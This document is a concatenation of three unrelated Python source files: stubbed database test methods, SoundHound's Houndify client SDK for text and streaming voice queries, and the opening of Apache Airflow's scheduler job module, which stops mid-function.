def testReportsNonExistingHashesAsNone(self):
pass
def testCorrectlyHandlesRequestWithOneExistingAndOneMissingHash(self):
pass
def testMultipleHashBlobReferencesCanBeWrittenAndReadBack(self):
pass
def testWritingBlobReferenceToNonExistentPathRaises(self):
pass
def testReadingBlobReferenceFromNonExistentPathReturnsEmptyResult(self):
pass
def testSingleBlobReferenceCanBeWrittenAndThenRead(self):
pass
def testMultipleBlobReferencesCanBeWrittenAndThenRead(self):
pass
def testReadPathInfoOlder(self):
pass
def testReadPathInfosHistoriesEmpty(self):
pass
def testReadPathInfosHistoriesDoesNotRaiseOnUnknownClient(self):
pass
def testReadPathInfosHistoriesWithSingleFileWithSingleHistoryItem(self):
pass
def testReadPathInfosHistoriesWithTwoFilesWithSingleHistoryItemEach(self):
pass
def testReadPathInfosHistoriesWithTwoFilesWithTwoHistoryItems(self):
pass
def testInitPathInfosValidatesClient(self):
pass
def testInitPathInfosEmpty(self):
pass
def testInitPathInfosWriteSingle(self):
pass
def testInitPathInfosWriteMany(self):
pass
def testInitPathInfosTree(self):
pass
def testInitPathInfosClearsStatHistory(self):
pass
def testInitPathInfosClearsHashHistory(self):
pass
def testInitPathInfosRetainsIndirectPathHistory(self):
pass
def testMultiInitPathInfos(self):
pass
def testMultiInitPathInfosEmptyDoesNotThrow(self):
pass
def testMultiInitPathInfosNoPathsDoesNotThrow(self):
pass
def testClearPathHistoryEmpty(self):
pass
def testClearPathHistorySingle(self):
pass
def testClearPathHistoryManyRecords(self):
pass
def testClearPathHistoryOnlyDirect(self):
pass
def testMultiClearPathHistoryEmptyDoesNotRaise(self):
pass
def testMultiClearPathHistoryNoPathsDoesNotRaise(self):
pass
def testMultiClearPathHistoryClearsMultipleHistories(self):
pass
def testFlowWriting(self):
pass
def testFlowWritingUnknownClient(self):
pass
def testPersistentDataUpdate(self):
pass
def testCrashInfoUpdate(self):
pass
def testPendingTerminationUpdate(self):
pass
def testProcessingInformationUpdate(self):
pass
def testRequestWriting(self):
pass
def testResponsesForUnknownFlow(self):
pass
def testResponsesForUnknownRequest(self):
pass
def testResponseWriting(self):
pass
def testResponsesForEarlierRequestDontTriggerFlowProcessing(self):
pass
def testResponsesForLaterRequestDontTriggerFlowProcessing(self):
pass
def testResponsesForExpectedRequestTriggerFlowProcessing(self):
pass
def testResponsesAnyRequestTriggerClientMessageDeletion(self):
pass
def testReadFlowForProcessingThatIsAlreadyBeingProcessed(self):
pass
def testReadFlowForProcessingAfterProcessingTimeExpiration(self):
pass
def testReadFlowForProcessingUpdatesFlowObjects(self):
pass
def testReturnProcessedFlow(self):
pass
def testReadChildFlows(self):
pass
def testRequestWritingHighIDDoesntTriggerFlowProcessing(self):
pass
def testRequestWritingLowIDDoesntTriggerFlowProcessing(self):
pass
def testRequestWritingExpectedIDTriggersFlowProcessing(self):
pass
def testDeleteFlowRequests(self):
pass
def testDeleteAllFlowRequestsAndResponses(self):
pass
def testReadFlowRequestsReadyForProcessing(self):
pass
def testFlowProcessingRequestsQueue(self):
pass
def testFlowProcessingRequestsQueueWithDelay(self):
pass
def testAcknowledgingFlowProcessingRequestsWorks(self):
pass
def testStatusMessagesCanBeWrittenAndRead(self):
pass
def testWritesAndReadsSingleFlowResultOfSingleType(self):
pass
def testWritesAndReadsMultipleFlowResultsOfSingleType(self):
pass
def testWritesAndReadsMultipleFlowResultsWithDifferentTimestamps(self):
pass
def testWritesAndReadsMultipleFlowResultsOfMultipleTypes(self):
pass
def testReadFlowResultsCorrectlyAppliesOffsetAndCountFilters(self):
pass
def testReadFlowResultsCorrectlyAppliesWithTagFilter(self):
pass
def testReadFlowResultsCorrectlyAppliesWithTypeFilter(self):
pass
def testReadFlowResultsCorrectlyAppliesWithSubstringFilter(self):
pass
def testReadFlowResultsCorrectlyAppliesVariousCombinationsOfFilters(self):
pass
def testReadFlowResultsReturnsPayloadWithMissingTypeAsSpecialValue(self):
pass
def testCountFlowResultsReturnsCorrectResultsCount(self):
pass
def testCountFlowResultsCorrectlyAppliesWithTagFilter(self):
pass
def testCountFlowResultsCorrectlyAppliesWithTypeFilter(self):
pass
def testCountFlowResultsCorrectlyAppliesWithTagAndWithTypeFilters(self):
pass
def testWritesAndReadsSingleFlowLogEntry(self):
pass
def testWritesAndReadsMultipleFlowLogEntries(self):
pass
def testReadFlowLogEntriesCorrectlyAppliesOffsetAndCountFilters(self):
pass
def testReadFlowLogEntriesCorrectlyAppliesWithSubstringFilter(self):
pass
def testReadFlowLogEntriesCorrectlyAppliesVariousCombinationsOfFilters(self):
pass
def testCountFlowLogEntriesReturnsCorrectFlowLogEntriesCount(self):
pass
if __name__ == "__main__":
unittest.main()
|
houndify.py
|
##############################################################################
# Copyright 2017 SoundHound, Incorporated. All rights reserved.
##############################################################################
import base64
import hashlib
import hmac
import http.client
import json
import threading
import time
import uuid
import urllib.request, urllib.parse, urllib.error
import struct
try:
import pySHSpeex
except ImportError:
pass
HOUND_SERVER = "api.houndify.com"
TEXT_ENDPOINT = "/v1/text"
VOICE_ENDPOINT = "/v1/audio"
VERSION = '1.0.0'
class _BaseHoundClient(object):
def __init__(self, clientID, clientKey, userID, hostname, proxyHost, proxyPort, proxyHeaders):
self.clientID = clientID
self.clientKey = base64.urlsafe_b64decode(clientKey)
self.userID = userID
self.hostname = hostname
self.proxyHost = proxyHost
self.proxyPort = proxyPort
self.proxyHeaders = proxyHeaders
self.HoundRequestInfo = {
'ClientID': clientID,
'UserID': userID,
'SDK': 'python2.7',
'SDKVersion': VERSION
}
def setHoundRequestInfo(self, key, value):
"""
There are various fields in the HoundRequestInfo object that can
be set to help the server provide the best experience for the client.
Refer to the Houndify documentation to see what fields are available
and set them through this method before starting a request
"""
self.HoundRequestInfo[key] = value
def removeHoundRequestInfo(self, key):
"""
Remove request info field through this method before starting a request
"""
self.HoundRequestInfo.pop(key, None)
def setLocation(self, latitude, longitude):
"""
Many domains make use of the client location information to provide
relevant results. This method can be called to provide this information
to the server before starting the request.
latitude and longitude are floats (not string)
"""
self.HoundRequestInfo['Latitude'] = latitude
self.HoundRequestInfo['Longitude'] = longitude
self.HoundRequestInfo['PositionTime'] = int(time.time())
def setConversationState(self, conversation_state):
self.HoundRequestInfo["ConversationState"] = conversation_state
if "ConversationStateTime" in conversation_state:
self.HoundRequestInfo["ConversationStateTime"] = conversation_state["ConversationStateTime"]
def _generateHeaders(self, requestInfo):
requestID = str(uuid.uuid4())
if 'RequestID' in requestInfo:
requestID = requestInfo['RequestID']
timestamp = str(int(time.time()))
if 'TimeStamp' in requestInfo:
timestamp = str(requestInfo['TimeStamp'])
HoundRequestAuth = self.userID + ";" + requestID
h = hmac.new(self.clientKey, (HoundRequestAuth + timestamp).encode('utf-8'), hashlib.sha256)
signature = base64.urlsafe_b64encode(h.digest()).decode('utf-8')
HoundClientAuth = self.clientID + ";" + timestamp + ";" + signature
headers = {
'Hound-Request-Info': json.dumps(requestInfo),
'Hound-Request-Authentication': HoundRequestAuth,
'Hound-Client-Authentication': HoundClientAuth
}
if 'InputLanguageEnglishName' in requestInfo:
headers["Hound-Input-Language-English-Name"] = requestInfo["InputLanguageEnglishName"]
if 'InputLanguageIETFTag' in requestInfo:
headers["Hound-Input-Language-IETF-Tag"] = requestInfo["InputLanguageIETFTag"]
return headers
class TextHoundClient(_BaseHoundClient):
"""
TextHoundClient is used for making text queries for Hound
"""
def __init__(self, clientID, clientKey, userID, requestInfo = dict(), hostname = HOUND_SERVER, proxyHost = None, proxyPort = None, proxyHeaders = None):
_BaseHoundClient.__init__(self, clientID, clientKey, userID, hostname, proxyHost, proxyPort, proxyHeaders)
self.HoundRequestInfo.update(requestInfo)
def query(self, query):
"""
Make a text query to Hound.
query is the string of the query
"""
headers = self._generateHeaders(self.HoundRequestInfo)
if self.proxyHost:
conn = http.client.HTTPSConnection(self.proxyHost, self.proxyPort)
conn.set_tunnel(self.hostname, headers = self.proxyHeaders)
else:
conn = http.client.HTTPSConnection(self.hostname)
conn.request('GET', TEXT_ENDPOINT + '?query=' + urllib.parse.quote(query), headers = headers)
resp = conn.getresponse()
raw_response = resp.read()
try:
parsedMsg = json.loads(raw_response)
return parsedMsg
except:
return { "Error": raw_response }
class HoundListener(object):
"""
HoundListener is an abstract base class that defines the callbacks
that can be received while streaming speech to the server
"""
def onPartialTranscript(self, transcript):
"""
onPartialTranscript is fired when the server has sent a partial transcript
in live transcription mode. 'transcript' is a string with the partial transcript
"""
pass
def onFinalResponse(self, response):
"""
onFinalResponse is fired when the server has completed processing the query
and has a response. 'response' is the JSON object (as a Python dict) which
the server sends back.
"""
pass
def onError(self, err):
"""
onError is fired if there is an error interacting with the server. It contains
the parsed JSON from the server.
"""
pass
class StreamingHoundClient(_BaseHoundClient):
"""
StreamingHoundClient is used to send streaming audio to the Hound
server and receive live transcriptions back
"""
def __init__(self, clientID, clientKey, userID, requestInfo = dict(), hostname = HOUND_SERVER, sampleRate = 16000, useSpeex = False, proxyHost = None, proxyPort = None, proxyHeaders = None):
"""
clientID and clientKey are "Client ID" and "Client Key"
from the Houndify.com web site.
"""
_BaseHoundClient.__init__(self, clientID, clientKey, userID, hostname, proxyHost, proxyPort, proxyHeaders)
self.sampleRate = sampleRate
self.useSpeex = useSpeex
self.HoundRequestInfo['PartialTranscriptsDesired'] = True
self.HoundRequestInfo.update(requestInfo)
def setSampleRate(self, sampleRate):
"""
Override the default sample rate of 16 khz for audio.
NOTE that only 8 khz and 16 khz are supported
"""
if sampleRate == 8000 or sampleRate == 16000:
self.sampleRate = sampleRate
else:
raise Exception("Unsupported sample rate")
def start(self, listener=HoundListener()):
"""
This method is used to make the actual connection to the server and prepare
for audio streaming.
listener is a HoundListener (or derived class) object
"""
self.audioFinished = False
self.lastResult = None
self.buffer = ''
if self.proxyHost:
self.conn = http.client.HTTPSConnection(self.proxyHost, self.proxyPort)
self.conn.set_tunnel(self.hostname, headers = self.proxyHeaders)
else:
self.conn = http.client.HTTPSConnection(self.hostname)
self.conn.putrequest('POST', VOICE_ENDPOINT)
headers = self._generateHeaders(self.HoundRequestInfo)
headers['Transfer-Encoding'] = 'chunked';
for header in headers:
self.conn.putheader(header, headers[header])
self.conn.endheaders()
self.callbackTID = threading.Thread(target = self._callback, args = (listener,))
self.callbackTID.start()
audio_header = self._wavHeader(self.sampleRate)
if self.useSpeex:
audio_header = pySHSpeex.Init(self.sampleRate == 8000)
self._send(audio_header)
def fill(self, data):
"""
After successfully connecting to the server with start(), pump PCM samples
through this method.
data is 16-bit, 8 KHz/16 KHz little-endian PCM samples.
Returns True if the server detected the end of audio and is processing the data
or False if the server is still accepting audio
"""
# buffer gets flushed on next call to start()
if self.audioFinished:
return True
self.buffer += data
# 20ms 16-bit audio frame = (2 * 0.02 * sampleRate) bytes
frame_size = int(2 * 0.02 * self.sampleRate)
while len(self.buffer) > frame_size:
frame = self.buffer[:frame_size]
if self.useSpeex:
frame = pySHSpeex.EncodeFrame(frame)
self._send(frame)
self.buffer = self.buffer[frame_size:]
return False
def finish(self):
"""
Once fill returns True, call finish() to finalize the transaction. finish will
wait for all the data to be received from the server.
After finish() is called, you can start another request with start() but each
start() call should have a corresponding finish() to wait for the threads
"""
self._send('')
self.callbackTID.join()
return self.lastResult
def _callback(self, listener):
read_headers = True
headers = ''
body = ''
for line in self._readline(self.conn.sock):
if read_headers:
headers += line
if headers.endswith('\r\n\r\n'):
read_headers = False
continue
body += line
parsedMsg = None
try:
parsedMsg = json.loads(line)
except:
continue
if type(parsedMsg) is not dict:
continue
if "Status" in parsedMsg and parsedMsg["Status"] == "Error":
self.lastResult = parsedMsg
listener.onError(parsedMsg)
self.audioFinished = True
return
if "Format" in parsedMsg:
if parsedMsg["Format"] == "SoundHoundVoiceSearchParialTranscript" or parsedMsg["Format"] == "HoundVoiceQueryPartialTranscript":
## also check SafeToStopAudio
listener.onPartialTranscript(parsedMsg["PartialTranscript"])
if "SafeToStopAudio" in parsedMsg and parsedMsg["SafeToStopAudio"]:
## Because of the GIL, simple flag assignment like this is atomic
self.audioFinished = True
if parsedMsg["Format"] == "SoundHoundVoiceSearchResult" or parsedMsg["Format"] == "HoundQueryResult":
self.lastResult = parsedMsg
listener.onFinalResponse(parsedMsg)
return
self.lastResult = { "Error": body }
listener.onError({ "Error": body })
self.audioFinished = True
def _wavHeader(self, sampleRate=16000):
genHeader = "RIFF"
genHeader += struct.pack('<L', 36) #ChunkSize - dummy
genHeader += "WAVE"
genHeader += "fmt "
genHeader += struct.pack('<L', 16) #Subchunk1Size
genHeader += struct.pack('<H', 1) #AudioFormat - PCM
genHeader += struct.pack('<H', 1) #NumChannels
genHeader += struct.pack('<L', sampleRate) #SampleRate
genHeader += struct.pack('<L', 8 * sampleRate) #ByteRate
genHeader += struct.pack('<H', 2) #BlockAlign
genHeader += struct.pack('<H', 16) #BitsPerSample
genHeader += "data"
genHeader += struct.pack('<L', 0) #Subchunk2Size - dummy
return genHeader
def _send(self, msg):
if self.conn:
chunkSize = "%x\r\n" % len(msg)
try:
self.conn.send(chunkSize)
self.conn.send(msg + '\r\n')
except:
self.conn.close()
self.conn = None
def _readline(self, socket):
_buffer = ''
while True:
more = socket.recv(4096)
if not more: break
_buffer += more
while True:
split_buffer = _buffer.split("\r\n", 1)
if len(split_buffer) == 1: break
_buffer = split_buffer[1]
yield split_buffer[0] + "\r\n"
if _buffer: yield _buffer
|
scheduler_job.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import logging
import multiprocessing
import os
import signal
import sys
import threading
import time
from collections import defaultdict
from datetime import timedelta
from time import sleep
from past.builtins import basestring
import six
from setproctitle import setproctitle
from sqlalchemy import and_, func, not_, or_
from sqlalchemy.orm.session import make_transient
from airflow.configuration import conf
from airflow import executors, models, settings
from airflow.exceptions import AirflowException, TaskNotFound
from airflow.jobs.base_job import BaseJob
from airflow.models import DagRun, SlaMiss, errors
from airflow.settings import Stats
from airflow.ti_deps.dep_context import DepContext, SCHEDULED_DEPS
from airflow.operators.dummy_operator import DummyOperator
from airflow.ti_deps.deps.pool_slots_available_dep import STATES_TO_COUNT_AS_RUNNING
from airflow.utils import asciiart, helpers, timezone
from airflow.utils.dag_processing import (AbstractDagFileProcessor,
DagFileProcessorAgent,
SimpleDag,
SimpleDagBag,
SimpleTaskInstance,
list_py_file_paths)
from airflow.utils.db import provide_session
from airflow.utils.email import get_email_address_list, send_email
from airflow.utils.mixins import MultiprocessingStartMethodMixin
from airflow.utils.log.logging_mixin import LoggingMixin, StreamLogWriter, set_context
from airflow.utils.state import State
from typing import List
from airflow import DAG
from airflow.models import DagModel, DagBag
from airflow.models.serialized_dag import SerializedDagModel
from airflow.settings import MIN_SERIALIZED_DAG_UPDATE_INTERVAL
from sqlalchemy.orm import Session
class DagFileProcessor(AbstractDagFileProcessor, LoggingMixin, MultiprocessingStartMethodMixin):
"""Helps call SchedulerJob.process_file() in a separate process.
:param file_path: a Python file containing Airflow DAG definitions
:type file_path: unicode
:param pickle_dags: whether to serialize the DAG objects to the DB
:type pickle_dags: bool
:param dag_ids: If specified, only look at these DAG ID's
:type dag_ids: list[unicode]
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
"""
# Counter that increments every time an instance of this class is created
class_creation_counter = 0
def __init__(self, file_path, pickle_dags, dag_ids, zombies):
self._file_path = file_path
# The process that was launched to process the given .
self._process = None
self._dag_ids = dag_ids
self._pickle_dags = pickle_dags
self._zombies = zombies
# The result of Scheduler.process_file(file_path).
self._result = None
# Whether the process is done running.
self._done = False
# When the process started.
self._start_time = None
# This ID is use to uniquely name the process / thread that's launched
# by this processor instance
self._instance_id = DagFileProcessor.class_creation_counter
DagFileProcessor.class_creation_counter += 1
@property
def file_path(self):
return self._file_path
@staticmethod
def _run_file_processor(result_channel,
file_path,
pickle_dags,
dag_ids,
thread_name,
zombies):
"""
Process the given file.
:param result_channel: the connection to use for passing back the result
:type result_channel: multiprocessing.Connection
:param file_path: the file to process
:type file_path: unicode
:param pickle_dags: whether to pickle the DAGs found in the file and
save them to the DB
:type pickle_dags: bool
:param dag_ids: if specified, only examine DAG ID's that are
in this list
:type dag_ids: list[unicode]
:param thread_name: the name to use for the process that is launched
:type thread_name: unicode
:param zombies: zombie task instances to kill
:type zombies: list[airflow.utils.dag_processing.SimpleTaskInstance]
:return: the process that was launched
:rtype: multiprocessing.Process
"""
# This helper runs in the newly created process
log = logging.getLogger("airflow.processor")
stdout = StreamLogWriter(log, logging.INFO)
stderr = StreamLogWriter(log, logging.WARN)
set_context(log, file_path)
setproctitle("airflow scheduler - DagFileProcessor {}".format(file_path))
try:
# redirect stdout/stderr to log
sys.stdout = stdout
sys.stderr = stderr
# Re-configure the ORM engine as there are issues with multiple processes
settings.configure_orm()
# Change the thread name to differentiate log lines. This is
# really a separate process, but changing the name of the
# process doesn't work, so changing the thread name instead.
threading.current_thread().name = thread_name
start_time = time.time()
log.info("Started process (PID=%s) to work on %s",
os.getpid(), file_path)
scheduler_job = SchedulerJob(dag_ids=dag_ids, log=log)
result = scheduler_job.process_file(file_path,
zombies,
pickle_dags)
result_channel.send(result)
end_time = time.time()
log.info(
"Processing %s took %.3f seconds", file_path, end_time - start_time
)
except Exception:
# Log exceptions through the logging framework.
log.exception("Got an exception! Propagating...")
raise
finally:
result_channel.close()
sys.stdout = sys.__stdout__
sys.stderr = sys.__stderr__
# We re-initialized the ORM within this Process above so we need to
# tear it down manually here
settings.dispose_orm()
def start(self):
"""
Launch the process and start processing the DAG.
"""
if six.PY2:
context = multiprocessing
else:
start_method = self._get_multiprocessing_start_method()
context = multiprocessing.get_context(start_method)
self._parent_channel, _child_channel = context.Pipe()
self._process = context.Process(
target=type(self)._run_file_processor,
args=(
_child_channel,
self.file_path,
self._pickle_dags,
self._dag_ids,
"DagFileProcessor{}".format(self._instance_id),
self._zombies
),
name="DagFileProcessor{}-Process".format(self._instance_id)
)
self._start_time = timezone.utcnow()
self._process.start()
def kill(self):
"""
Kill the process launched to process the file, and ensure consistent state.
"""
if self._process is None:
raise AirflowException("Tried to kill before starting!")
# The queue will likely get corrupted, so remove the reference
self._result_queue = None
self._kill_process()
def terminate(self, sigkill=False):
"""
Terminate (and then kill) the process launched to process the file.
:param sigkill: whether to issue a SIGKILL if SIGTERM doesn't work.
:type sigkill: bool
"""
if self._process is None:
raise AirflowException("Tried to call terminate before starting!")
self._process.terminate()
# Arbitrarily wait 5s for the process to die
if six.PY2:
self._process.join(5)
else:
from contextlib import suppress
with suppress(TimeoutError):
self._process._popen.wait(5) # pylint: disable=protected-access
if sigkill:
self._kill_process()
self._parent_channel.close()
def _kill_process(self):
if self._process.is_alive():
self.log.warning("Killing PID %s", self._process.pid)
os.kill(self._process.pid, signal.SIGKILL)
@property
def pid(self):
"""
:return: the PID of the process launched to process the given file
:rtype: int
"""
if self._process is None:
raise AirflowException("Tried to get PID before starting!")
return self._process.pid
@property
def exit_code(self):
"""
After the process is finished, this can be called to get the return code
:return: the exit code of the process
:rtype: int
"""
if not self._done:
raise AirflowException("Tried to call retcode before process was finished!")
return self._process.exitcode
@property
def done(self):
"""
Check if the process launched to process this file is done.
:return: whether the process is finished running
:rtype: bool
"""
if self._process is None:
raise AirflowException("Tried to see if it's done before starting!")
if self._done:
return True
if self._parent_channel.poll():
try:
self._result = self._parent_channel.recv()
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
except EOFError:
pass
if not self._process.is_alive():
self._done = True
self.log.debug("Waiting for %s", self._process)
self._process.join()
self._parent_channel.close()
return True
return False
@property
def result(self):
"""
:return: result of running SchedulerJob.process_file()
:rtype: airflow.utils.dag_processing.SimpleDag
"""
if not self.done:
raise AirflowException("Tried to get the result before it's done!")
return self._result
@property
def start_time(self):
"""
:return: when this started to process the file
:rtype: datetime
"""
if self._start_time is None:
raise AirflowException("Tried to get start time before it started!")
return self._start_time
class SchedulerJob(BaseJob):
"""
This SchedulerJob runs for a specific time interval and schedules the jobs
that are ready to run. It figures out the latest runs for each
task and sees if the dependencies for the next schedules are met.
If so, it creates appropriate TaskInstances and sends run commands to the
executor. It does this for each task in each DAG and repeats.
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param run_duration: how long to run (in seconds) before exiting
:type run_duration: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
__mapper_args__ = {
'polymorphic_identity': 'SchedulerJob'
}
heartrate = conf.getint('scheduler', 'SCHEDULER_HEARTBEAT_SEC')
def __init__(
self,
dag_id=None,
dag_ids=None,
subdir=settings.DAGS_FOLDER,
num_runs=conf.getint('scheduler', 'num_runs', fallback=-1),
processor_poll_interval=conf.getfloat(
'scheduler', 'processor_poll_interval', fallback=1),
run_duration=None,
do_pickle=False,
log=None,
*args, **kwargs):
"""
:param dag_id: if specified, only schedule tasks with this DAG ID
:type dag_id: unicode
:param dag_ids: if specified, only schedule tasks with these DAG IDs
:type dag_ids: list[unicode]
:param subdir: directory containing Python files with Airflow DAG
definitions, or a specific path to a file
:type subdir: unicode
:param num_runs: The number of times to try to schedule each DAG file.
-1 for unlimited times.
:type num_runs: int
:param processor_poll_interval: The number of seconds to wait between
polls of running processors
:type processor_poll_interval: int
:param do_pickle: once a DAG object is obtained by executing the Python
file, whether to serialize the DAG object to the DB
:type do_pickle: bool
"""
# for BaseJob compatibility
self.dag_id = dag_id
self.dag_ids = [dag_id] if dag_id else []
if dag_ids:
self.dag_ids.extend(dag_ids)
self.subdir = subdir
self.num_runs = num_runs
self.run_duration = run_duration
self._processor_poll_interval = processor_poll_interval
self.do_pickle = do_pickle
super(SchedulerJob, self).__init__(*args, **kwargs)
self.max_threads = conf.getint('scheduler', 'max_threads')
if log:
self._log = log
self.using_sqlite = False
self.using_mysql = False
if conf.get('core', 'sql_alchemy_conn').lower().startswith('sqlite'):
self.using_sqlite = True
if conf.get('core', 'sql_alchemy_conn').lower().startswith('mysql'):
self.using_mysql = True
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
self.processor_agent = None
self.max_tis_per_query = conf.getint('scheduler', 'max_tis_per_query')
if run_duration is None:
self.run_duration = conf.getint('scheduler',
'run_duration')
self.processor_agent = None
signal.signal(signal.SIGINT, self._exit_gracefully)
signal.signal(signal.SIGTERM, self._exit_gracefully)
def _exit_gracefully(self, signum, frame):
"""
Helper method to clean up processor_agent to avoid leaving orphan processes.
"""
self.log.info("Exiting gracefully upon receiving signal %s", signum)
if self.processor_agent:
self.processor_agent.end()
sys.exit(os.EX_OK)
def is_alive(self, grace_multiplier=None):
"""
Is this SchedulerJob alive?
We define alive as in a state of running and a heartbeat within the
threshold defined in the ``scheduler_health_check_threshold`` config
setting.
``grace_multiplier`` is accepted for compatibility with the parent class.
:rtype: boolean
"""
if grace_multiplier is not None:
# Accept the same behaviour as superclass
return super(SchedulerJob, self).is_alive(grace_multiplier=grace_multiplier)
scheduler_health_check_threshold = conf.getint('scheduler', 'scheduler_health_check_threshold')
return (
self.state == State.RUNNING and
(timezone.utcnow() - self.latest_heartbeat).total_seconds() < scheduler_health_check_threshold
)
@provide_session
def manage_slas(self, dag, session=None):
"""
Finding all tasks that have SLAs defined, and sending alert emails
where needed. New SLA misses are also recorded in the database.
We are assuming that the scheduler runs often, so we only check for
tasks that should have succeeded in the past hour.
"""
if not any([isinstance(ti.sla, timedelta) for ti in dag.tasks]):
self.log.info("Skipping SLA check for %s because no tasks in DAG have SLAs", dag)
return
# This is a temporary fix for 1.10.4 release.
# Background: AIRFLOW-4297
# TODO: refactor manage_slas() to handle related issues.
if dag.normalized_schedule_interval is None:
self.log.info("SLA check for DAGs with schedule_interval 'None'/'@once' are "
"skipped in 1.10.4, due to related refactoring going on.")
return
TI = models.TaskInstance
sq = (
session
.query(
TI.task_id,
func.max(TI.execution_date).label('max_ti'))
.with_hint(TI, 'USE INDEX (PRIMARY)', dialect_name='mysql')
.filter(TI.dag_id == dag.dag_id)
.filter(or_(
TI.state == State.SUCCESS,
TI.state == State.SKIPPED))
.filter(TI.task_id.in_(dag.task_ids))
.group_by(TI.task_id).subquery('sq')
)
max_tis = session.query(TI).filter(
TI.dag_id == dag.dag_id,
TI.task_id == sq.c.task_id,
TI.execution_date == sq.c.max_ti,
).all()
ts = timezone.utcnow()
for ti in max_tis:
task = dag.get_task(ti.task_id)
dttm = ti.execution_date
if isinstance(task.sla, timedelta):
dttm = dag.following_schedule(dttm)
while dttm < timezone.utcnow():
following_schedule = dag.following_schedule(dttm)
if following_schedule + task.sla < timezone.utcnow():
session.merge(SlaMiss(
task_id=ti.task_id,
dag_id=ti.dag_id,
execution_date=dttm,
timestamp=ts))
dttm = dag.following_schedule(dttm)
session.commit()
slas = (
session
.query(SlaMiss)
.filter(SlaMiss.notification_sent == False, SlaMiss.dag_id == dag.dag_id) # noqa pylint: disable=singleton-comparison
.all()
)
if slas:
sla_dates = [sla.execution_date for sla in slas]
qry = (
session
.query(TI)
.filter(
TI.state != State.SUCCESS,
TI.execution_date.in_(sla_dates),
TI.dag_id == dag.dag_id
).all()
)
blocking_tis = []
for ti in qry:
if ti.task_id in dag.task_ids:
ti.task = dag.get_task(ti.task_id)
blocking_tis.append(ti)
else:
session.delete(ti)
session.commit()
task_list = "\n".join([
sla.task_id + ' on ' + sla.execution_date.isoformat()
for sla in slas])
blocking_task_list = "\n".join([
ti.task_id + ' on ' + ti.execution_date.isoformat()
for ti in blocking_tis])
# Track whether email or any alert notification sent
# We consider email or the alert callback as notifications
email_sent = False
notification_sent = False
if dag.sla_miss_callback:
# Execute the alert callback
self.log.info(' --------------> ABOUT TO CALL SLA MISS CALL BACK ')
try:
dag.sla_miss_callback(dag, task_list, blocking_task_list, slas,
blocking_tis)
notification_sent = True
except Exception:
self.log.exception("Could not call sla_miss_callback for DAG %s",
dag.dag_id)
email_content = """\
Here's a list of tasks that missed their SLAs:
<pre><code>{task_list}\n<code></pre>
Blocking tasks:
<pre><code>{blocking_task_list}\n{bug}<code></pre>
""".format(task_list=task_list, blocking_task_list=blocking_task_list,
bug=asciiart.bug)
tasks_missed_sla = []
for sla in slas:
try:
task = dag.get_task(sla.task_id)
except TaskNotFound:
# task already deleted from DAG, skip it
self.log.warning(
"Task %s doesn't exist in DAG anymore, skipping SLA miss notification.",
sla.task_id)
continue
tasks_missed_sla.append(task)
emails = set()
for task in tasks_missed_sla:
if task.email:
if isinstance(task.email, basestring):
emails |= set(get_email_address_list(task.email))
elif isinstance(task.email, (list, tuple)):
emails |= set(task.email)
if emails:
try:
send_email(
emails,
"[airflow] SLA miss on DAG=" + dag.dag_id,
email_content)
email_sent = True
notification_sent = True
except Exception:
self.log.exception("Could not send SLA Miss email notification for"
" DAG %s", dag.dag_id)
# If we sent any notification, update the sla_miss table
if notification_sent:
for sla in slas:
if email_sent:
sla.email_sent = True
sla.notification_sent = True
session.merge(sla)
session.commit()
@staticmethod
def update_import_errors(session, dagbag):
"""
For the DAGs in the given DagBag, record any associated import errors and clears
errors for files that no longer have them. These are usually displayed through the
Airflow UI so that users know that there are issues parsing DAGs.
:param session: session for ORM operations
:type session: sqlalchemy.orm.session.Session
:param dagbag: DagBag containing DAGs with import errors
:type dagbag: airflow.models.DagBag
"""
# Clear the errors of the processed files
for dagbag_file in dagbag.file_last_changed:
session.query(errors.ImportError).filter(
errors.ImportError.filename == dagbag_file
).delete()
# Add the errors of the processed files
for filename, stacktrace in six.iteritems(dagbag.import_errors):
session.add(errors.ImportError(
filename=filename,
timestamp=timezone.utcnow(),
stacktrace=stacktrace))
session.commit()
@provide_session
def create_dag_run(self, dag, session=None):
"""
This method checks whether a new DagRun needs to be created
for a DAG based on scheduling interval.
Returns DagRun if one is scheduled. Otherwise returns None.
"""
if dag.schedule_interval and conf.getboolean('scheduler', 'USE_JOB_SCHEDULE'):
active_runs = DagRun.find(
dag_id=dag.dag_id,
state=State.RUNNING,
external_trigger=False,
session=session
)
# return if already reached maximum active runs and no timeout setting
if len(active_runs) >= dag.max_active_runs and not dag.dagrun_timeout:
return
timedout_runs = 0
for dr in active_runs:
if (
dr.start_date and dag.dagrun_timeout and
dr.start_date < timezone.utcnow() - dag.dagrun_timeout):
dr.state = State.FAILED
dr.end_date = timezone.utcnow()
dag.handle_callback(dr, success=False, reason='dagrun_timeout',
session=session)
timedout_runs += 1
session.commit()
if len(active_runs) - timedout_runs >= dag.max_active_runs:
return
# this query should be replaced by find dagrun
qry = (
session.query(func.max(DagRun.execution_date))
.filter_by(dag_id=dag.dag_id)
.filter(or_(
DagRun.external_trigger == False, # noqa: E712 pylint: disable=singleton-comparison
# add % as a wildcard for the like query
DagRun.run_id.like(DagRun.ID_PREFIX + '%')
))
)
last_scheduled_run = qry.scalar()
